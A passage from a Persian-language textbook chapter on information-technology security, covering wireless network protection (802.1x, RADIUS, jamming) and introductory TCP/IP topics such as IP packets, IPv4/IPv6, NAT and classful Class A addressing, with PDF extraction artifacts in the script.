‫ﻫﻮﻳﺖ ﺍﺯ ﻃﺮﻳﻖ ‪ 802.1x‬ﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺘﺮﻙ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺣﺎﻟﺖ ﺩﺭ ﺍﺻﻞ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺍﺩﺍﺭﺍﺕ‬
‫ﻛﻮﭼﻜﻲ ﺍﺳﺖ ﻛﻪ ﻗﺎﺩﺭ ﻧﻴﺴﺘﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ RADIUS‬ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ 802.1x‬ﻣﺴﺘﻘﺮ‬
‫ﻛﻨﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ‪ ،‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺤﻴﺢ ﺻﺎﻓﻴﻬﺎﻱ ﺑﺴﺘﻪﺍﻱ ﺩﺭ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﻣﻮﻗﻌﻴﺖ‬
‫ﻣﻨﺎﺳﺐ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﻫﻨﺪﺳﺔ ﺷﺒﻜﻪ )ﻛﻪ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺣﺎﻟﺖ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ(‪ ،‬ﻭ ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﻣﺴﺘﺤﻜﻢﺗﺮ‬
‫ﻛﺮﺩﻥ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪ .‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺷﺒﻜﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻧﻴﺰ ﻳﻚ ﺍﻗﺪﺍﻡ ﻣﻔﻴﺪ ﺍﺳﺖ‪.‬‬

‫ﺩﺭ ﭘﺎﻳﺎﻥ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻣﻌﺮﺽ ﭘﺎﺭﺍﺯﻳﺖ‪ ٢٧١‬ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺟﺎﻕ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻛﻪ ﺩﺭ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﻥ ﻳﻚ ﺷﻜﺎﻑ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻋﻤﻠﻴﺎﺕ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ‪ (802.11) Wi-Fi‬ﺭﺍ ﻣﺨﺘﻞ ﺳﺎﺯﺩ‪ ،‬ﭼﺮﺍﻛﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻭ ‪ Wi-Fi‬ﻫﺮﺩﻭ ﺍﺯ ﺑﺨﺶ ﻳﻜﺴﺎﻧﻲ ﺍﺯ ﻃﻴﻒ ‪ 2.4 GHz‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻟﺒﺘﻪ ﭘﺎﺭﺍﺯﻳﺖ ﻣﻨﺠﺮ ﺑﻪ ﺍﻓﺸﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺭﺍ ﺩﺭ ﻋﻤﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺳﺎﺯﺩ‪.‬‬
‫ﺩﻭ ﻛﺘﺎﺏ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﻳﻤﻦ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ "ﺍﻣﻨﻴﺖ ‪ "802.11‬ﻭ "ﺍﻣﻨﻴﺖ ‪ ،"RADIUS‬ﻛﻪ ﻫﺮ ﺩﻭ ﺗﻮﺳﻂ‬
‫ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﻫﻤﻜﺎﺭﺍﻥ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩﺍﻧﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎﻱ ‪TCP/IP‬‬
‫ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ )‪ (IP‬ﺑﻪ ﻣﺜﺎﺑﻪ ﭼﺴﺒﻲ ﺍﺳﺖ ﻛﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻮﻳﻦ ﺭﺍ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ‪ IP .‬ﺭﻭﺵ ﺍﻧﺘﻘﺎﻝ ﭘﻴﺎﻣﻬﺎ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻭ ﺩﺭ ﺣﻘﻴﻘﺖ ﻳﻚ "ﺯﺑﺎﻥ ﻣﺸﺘﺮﻙ" ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ‬
‫ﺻﺤﺒﺖ ﻛﺮﺩﻥ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻧﮕﺎﺭﺵ ﭼﻬﺎﺭﻡ ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ‪ ،IPv4 ،‬ﻛﻪ ﺍﺯ ﺳﺎﻝ ‪ ١٩٨٢‬ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺮﻭﺯ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ‬
‫ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺳﺎﻟﻬﺎﻱ ﺯﻳﺎﺩﻱ ﭘﺲ ﺍﺯ ﺍﻳﻦ ﻧﻴﺰ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ IPv5 .‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺁﺯﻣﺎﻳﺸﻲ ﺑﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻛﺎﺭﺑﺮﺩ‬
‫ﻲ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﻭ‬ ‫ﻭﺳﻴﻊ ﭘﻴﺪﺍ ﻧﻜﺮﺩ‪ ،‬ﻭ ‪ IPv6‬ﺟﺪﻳﺪﺗﺮﻳﻦ ﻧﮕﺎﺭﺵ ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﻣﺰﺍﻳﺎﻳﻲ ﭼﻮﻥ ﻓﻀﺎﻱ ﺁﺩﺭﺱﺩﻫ ﹺ‬
‫ﻗﺎﺑﻠﻴﺖ ﺫﺍﺗﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﺯ ﺳﺎﻝ ‪ ٢٠٠٣‬ﭘﺮﻭﺗﮑﻞ ‪ IPv6‬ﺑﻄﻮﺭ ﺁﺯﻣﺎﻳﺸﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺯﻳﺎﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻭ ﺑﺘﺪﺭﻳﺞ ﻧﻴﺰ‬
‫ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺼﻮﺭﺕ ﺑﻠﻮﻛﻬﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺑﻪ ﻧﺎﻡ ‪ datagram‬ﻭ ﻳﺎ ﺑﻪ ﺯﺑﺎﻥ ﻋﺎﻣﻴﺎﻧﻪﺗﺮ "ﺑﺴﺘﻪ" ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻫﺮ ﺑﺴﺘﻪ ﻳﻚ‬
‫ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﭼﻨﺪ ﺑﺎﻳﺖ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ "ﺳﺮﺁﻳﻨﺪ" ﻣﻲﮔﻮﻳﻨﺪ ﻭ ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺴﺘﻪ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ‪ .‬ﺑﺪﻧﺒﺎﻝ‬
‫ﻻ ﻳﻚ ﺑﻠﻮﻙ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﺑﺎﻳﺘﻬﺎ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ "ﻣﺤﺘﻮﺍ"ﻱ ﺑﺴﺘﻪ ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﻣﻲﺭﺳﻨﺪ‪،‬‬ ‫ﺳﺮﺁﻳﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫‪٢٧٢‬‬
‫ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﺑﺼﻮﺭﺕ ﭘﺸﺖﺳﺮﻫﻢ ﮔﺮﺩﻫﻢﺁﻭﺭﻱ ﻣﺠﺪﺩ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻗﻄﻌﻪﻗﻄﻌﻪ ﺷﺪﻥ ﻭ ﮔﺮﺩﻫﻢﺁﻭﺭﻱ‬
‫ﻻ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺎ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻣﺴﻴﺮﻫﺎﻱ‬ ‫ﻻ ﺍﺯ ﺩﻳﺪ ﻛﺎﺭﺑﺮ ﭘﻨﻬﺎﻥ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺠﺪﺩ ﺩﺍﺩﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺘﻔﺎﻭﺕ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻫﺮ ﺑﺴﺘﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺒﺪﺍﺀ ﺗﺎ ﻣﻘﺼﺪ ﻣﺴﻴﺮ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﻃﻲ ﻛﻨﺪ‪.‬‬

‫‪270 Wi-Fi Protected Access‬‬


‫‪271 Jamming‬‬
‫‪272 Reassemble‬‬
‫‪٣٩٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺧﻮﺩ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ‬
‫‪ IP‬ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﺎ ﺧﻄﻮﻁ ﻣﺴﺘﻘﻴﻢ ﺍﺳﺘﻴﺠﺎﺭﻱ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﺭﺍ ﺑﺼﻮﺭﺕ ﺟﺎﺳﺎﺯﻱﺷﺪﻩ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ‬
‫‪ Frame Relay‬ﻳﺎ ﺣﺎﻟﺖ ﺍﻧﺘﻘﺎﻝ ﻧﺎﻫﻤﮕﺎﻡ )‪ ٢٧٣(ATM‬ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﺁﺩﺭﺱﺩﻫﻲ ‪IP‬‬

‫ﺑﻪ ﺗﻤﺎﻡ ﻭﺍﺳﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ‪ IPv4‬ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻳﻚ ﺁﺩﺭﺱ ‪ ٣٢‬ﺑﻴﺘﻲ ﻳﻜﺘﺎ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ‬
‫ﺑﺼﻮﺭﺕ ‪ ٤‬ﻋﺪﺩ ‪ ٨‬ﺑﻴﺘﻲ ﻛﻪ ‪ octet‬ﻧﺎﻡ ﺩﺍﺭﻧﺪ ﺑﻴﺎﻥ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻳﻚ ﻧﻤﻮﻧﺔ ﺁﺩﺭﺱ‪ 18.70.0.224 ،‬ﺍﺳﺖ‪ .‬ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭼﻨﺪﻳﻦ‬
‫ﻭﺍﺳﻂ ﺷﺒﻜﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﻳﻚ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺯ‬
‫ﺩﻳﮕﺮﻱ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ‪ ٣٢‬ﺑﻴﺘﻲ ﺩﺭ ﺁﻥ ﻭﺍﺣﺪ ﺍﺟﺎﺯﺓ ﺍﺗﺼﺎﻝ ﺣﺪﺍﻛﺜﺮ ‪ ٢٣٢ = ٤،٢٩٤،٩٦٧،٢٩٦‬ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﻣﻲﺩﻫﺪ؛ ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺗﻌﺪﺍﺩ ﻛﻞ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﻧﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ‪ ٢٣٢‬ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ ‪proxy‬ﻫﺎ ﻭ ‪ NAT‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻣﺸﺘﺮﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﻛﻪ‬
‫ﭘﺸﺖ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻭﺍﺣﺪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺤﻮﺓ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ‬
‫ﺍﺯ ﺟﻤﻠﻪ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻣﺤﺪﻭﺩ‪ ،‬ﻭ ﻳﺎ ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻧﺎﻣﺤﺪﻭﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻳﺎ ﻫﺮ ﺩﻭ ﺟﻬﺖ ﺍﺭﺗﺒﺎﻁ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎﻱ ‪IP‬‬

‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺖ‪ .‬ﻫﺮﭼﻨﺪ ﻣﺮﺩﻡ ﺯﻳﺎﺩﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ ﻫﻤﮕﻲ ﺑﻪ ﺑﺰﺭﮔﻲ ﺷﺒﻜﺔ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮔﻲ ﻫﻤﭽﻮﻥ‬
‫‪ WorldCom ،AT&T‬ﻭ ‪ Sprint‬ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻫﺴﺘﻨﺪ‪،‬‬
‫ﻣﺜﻞ ﺷﺒﻜﺔ ﺩﺭﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺩﺍﺭﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﻳﻚ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻛﻮﭼﻚ ﺗﺤﻘﻴﻘﺎﺗﻲ‪ .‬ﺑﻪ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻮﭼﻚ‬
‫ﺷﻤﺎﺭﺓ ﺷﺒﻜﺔ ﻣﺨﺼﻮﺻﻲ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﻪ ﺩﻭ ﻃﺮﻳﻖ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻧﮕﺎﻩ ﻛﺮﺩ‪ .‬ﺷﻤﺎﺭﻩ ﺷﺒﻜﻪﻫﺎﻱ "ﻛﻼﺳﻴﻚ" ﺑﺎ ﭼﻨﺪ ﺑﻴﺖ ﭘﻴﺸﻮﻧﺪ ﺩﺭ ﺁﺩﺭﺱ ﻫﺮ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﺷﺒﻜﻪ‬
‫ﻣﺸﺨﺺ ﻣﻲﺷﺪﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻓﻀﺎﻱ ﺁﺩﺭﺱﺩﻫﻲ ﺭﺍ ﺑﻪ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺧﻮﺵﺗﻌﺮﻳﻔﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺩﺭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺗﻘﺴﻴﻢ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺭﻭﺵ ﺁﺩﺭﺱﺩﻫﻲ ﻛﻼﺳﻴﻚ‪ ٥ ،‬ﻧﻮﻉ ﺍﺻﻠﻲ ﺁﺩﺭﺱ ‪ IP‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﭼﻨﺪ ﺑﻴﺖ ﺍﻭﻝ ﺁﺩﺭﺱ )ﺑﻴﺘﻬﺎﻱ ﺑﺎ ﺍﺭﺯﺵ ﺑﻴﺸﺘﺮ( ﻛﻼﺱ ﻳﺎ ﺩﺳﺘﻪﺑﻨﺪﻱ‬
‫ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻛﻪ ﺁﺩﺭﺱ ﺑﻪ ﺁﻥ ﺗﻌﻠﻖ ﺩﺍﺭﺩ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﺑﻪ ﺩﻭ ﻗﺴﻤﺖ "ﺷﺒﻜﻪ" ﻭ "ﻣﻴﺰﺑﺎﻥ" ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ ‪A‬‬


‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ A‬ﺩﺍﺭﺍﻱ ﺁﺩﺭﺳﻬﺎﻳﻲ ﺑﺎ ﻗﺎﻟﺐ ‪ N.a.b.c‬ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ‪ N‬ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻭ ‪ a.b.c‬ﺷﻤﺎﺭﺓ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﺑﺎ ﺍﺭﺯﺷﺘﺮﻳﻦ ﺑﻴﺖ ‪) N‬ﺑﻴﺖ ﺳﻤﺖ ﭼﭗ( ﺑﺎﻳﺪ ﺻﻔﺮ ﺑﺎﺷﺪ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ A‬ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﻮﻥ ﺍﻳﻦ‬
‫ﺷﺒﻜﻪﻫﺎ ﺑﺎﻋﺚ ﻫﺪﺭ ﺭﻓﺘﻦ ﻓﻀﺎﻱ ﺁﺩﺭﺱﺩﻫﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﺴﻲ ‪ ١٦،٧٧٧،٢١٦‬ﻣﻴﺰﺑﺎﻥ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪،‬‬
‫‪٢٧٤‬‬
‫ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﻛﻼﺱ ‪ A‬ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ! ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻨﺪ ‪ MIT‬ﻭ ‪ BBN‬ﺷﺒﻜﻪﻫﺎﻳﻲ ﺍﺯ ﻛﻼﺱ ‪A‬‬
‫ﻼ ﺑﻪ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺷﺒﻜﺔ ﻓﻴﺰﻳﻜﻲ ﻭﺍﺣﺪ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﺷﺒﻜﻪ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﻋﻤ ﹰ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻛﻼﺱ ‪ B‬ﻳﺎ ﻛﻼﺱ ‪ C‬ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻋﻤﻞ ﺯﻳﺮﺷﺒﻜﻪﺳﺎﺯﻱ‪ ٢٧٥‬ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬

‫‪273 Asynchronous Transfer Mode‬‬


